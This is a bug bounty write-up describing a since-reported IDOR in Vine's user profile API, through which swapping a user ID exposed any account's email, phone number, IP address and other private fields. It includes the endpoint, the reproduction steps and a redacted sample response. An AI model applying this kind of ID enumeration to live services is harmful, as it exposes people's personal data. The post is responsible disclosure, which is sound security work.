Vine User Private information disclosure

Vine User Private information disclosure – BugBountyPOC

This post is published by Prial Islam as a contributor on BugBountyPOC .Note that the post is written by Prial Islam, & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest/contributor so other can also learn.If you’re interested in sharing your finding through Bug Bounty POC Platform just signup on blog and you can post freely.

Hello BugBountyPoc viewers,This is Prial Islam a security researcher from Bangladesh . This is my 1st write-up hope you all will forgive all mistakes .

Today I will write about a Critical Information Disclosure vulnerability what allowed me to get any Vine user sensitive information including Ip address/phone no/email .

I reported this bug to Twitter Security team in their Bug Bounty Program in Hackerone and they Rewarded me with a amount of 7560$ for this report . Vine has issued a statement regarding this vulnerability on their Vine blog Post here  and also Hackerone mentioned this vulnerability in hackerone Zerodaily Newslatter

  • Vulnerable Endpoint :- https://vine.co/api/users/profiles/<User Id>

When I was testing vine domains for something interesting I noticed the Endpoint what response was giving my account all information . I thought this is normal as many site have this type of endpoint what shows logined users information . So again I thought let’s try to exploit this with CORS if it is miss-configured . But CORS Policy was in place . Then I changed the user-id value to another users user-id and I got a shock that that user information was in front of me . By changing the user-id value I was able to get any vine user all information .

Reproduce :

  • Choose any user to get his all information and collect his User-ID

 

  • Now place the User-ID in below endpoint and visit it . You will get Response in body .

https://vine.co/api/users/profiles/<Userotn Id>

Response :

{“code”: “”, “data”: {“followerCount”: 16271364, “includePromoted”: 1, “captchaSucceeded”: 0, “recordComment”: null, “locale”: “iUS”, “shareUrl”: “https://vine.co/████████”, “hiddenPhoneNumber”: 0, “notPorn”: 0, “userId”: █████████, “private”: 0, “likeCount”: null, “commentCount”: null, “platforms”: [“android”, “ios”], “postCount”: null, “profileBackground”: “0x33ccbf”, “suspended”: null, “hiddenFacebook”: 0, “verifiedEmail”: 0, “explicitContent”: 0, “dmcaStrikeCount”: 0, “flaggedCount”: 7579, “verified”: 1, “loopCount”: 6132344784, “avatarUrl”: “http://v.cdn.vine.co/r/avatars/████████████████████████████████████████.jpg?versionId=JIjnvXTkbWpjvk7glYZIXDqt187couHr”, “authoredPostCount”: 598, “review_result_illegal_review”: 0, “review_result_ok”: 0, “review”: null, “suspendedBy”: null, “twitterId”: ████████, “phoneNumber”: “██████████”, “location”: “Los Angeles California”, “notifyActivity”: 1, “facebookConnected”: 1, “explicitContentAdmin”: 0, “statsTags”: null, “hiddenEmail”: 0, “unflaggable”: 0, “username”: “████████”, “modified”: “2017-01-29T01:24:00.000000”, “userIdStr”: “████████”, “twitterIdStr”: “████████”, “vanityUrls”: [“kingbach”], “remixDisabled”: 0, “deleted”: null, “categories”: null, “released”: 0, “loopVelocity”: null, “strikeCounts”: [{“count”: 0, “strikeType”: “SEVERE_POLICY_VIOLATION”}, {“count”: 0, “strikeType”: “DMCA”}, {“count”: 0, “strikeType”: “SENSITIVE”}, {“count”: 0, “strikeType”: “POSSIBLY_ILLEGAL”}, {“count”: 0, “strikeType”: “GRAPHIC_NON_VIOLATING”}, {“count”: 0, “strikeType”: “ESC”}], “uploadHD”: 1, “verifiedPhoneNumber”: 1, “hiddenTwitter”: 0, “vineVerified”: 1, “notifyMessages”: 1, “needsPhoneVerification”: 0, “repostCount”: null, “twitterScreenname”: “██████”, “secondaryColor”: “0x33ccbf”, “twitterVerified”: 1, “captchaRequired”: 0, “edition”: null, “acceptsOutOfNetworkConversations”: 1, “disableAddressBook”: 1, “description”: “Instagram/Twitter/Shots/SnapChat- @███ For booking go to the library”, “escStrikeCount”: 0, “review_result_explicit”: 0, “notificationsLastViewed”: “2016-04-26T21:03:35.000000”, “email”: “████████”, “hideFromPopular”: 0, “admin”: 0, “contentReview”: 0, “created”: “2013-04-13T19:30:31.000000”, “review_result_illegal_confirmed”: 0, “followingCount”: null, “lastLogin”: “2016-12-13T23:29:40.000000”, “escUser”: 0, “ipAddress”: “██████”, “twitterConnected”: 1}, “success”: true, “error”: “”}

 

Take a closer look in response and you will get a lot of private info about the user . Some of them are :

“platforms”: [“android”, “ios”]
“flaggedCount”: 7579
“twitterId”: “█████████”
“phoneNumber”: “█████”
“location”: “Los Angeles California”
“modified”: “2017-01-29T01:24:00.000000”
“notificationsLastViewed”: “2016-04-26T21:03:35.000000”
“email”: “█████████”
“created”: “2013-04-13T19:30:31.000000”
“lastLogin”: “2016-12-13T23:29:40.000000”
“ipAddress”: “█████”

Here Even ipAddress/email/phone no are being disclosed . So attacker can use these info and do malicious attacks on any vine user . And Attacker can dump all user information .

This will also effect twitter users as vine users can use their twitter account access to login vine services . I have also made a video POC on this vulnerability what you will get below . I have got the same vulnerability on another bug bounty program Edmodo website and you will found that one video poc in my Channel here .

Thanks for reading . Happy Hunting .

Prial Islam

Security researcher from Bangladesh .

You may also like...

3 Responses

  1. Mahad Ahmed says:

    Nice find!

  1. August 4, 2017

    […] Hello BugBountyPoc viewers, this is Khizer few days a go i was testing different sites for CORS (Cross Origin Resource Sharing ) issues so that i can see what actually it is as i took about a week to understand it from different sources and blogs so i found a website that was vulnerable and I tried to see what i can do with the CORS issue on it, To test the website for CORS issue i first use CURL, i.e: curl -H “Origin: -I As you can see the response of Curl request include, and Video. Vine User Private information disclosure – Bug Bounty POC. […]

Leave a Reply

Your email address will not be published. Required fields are marked *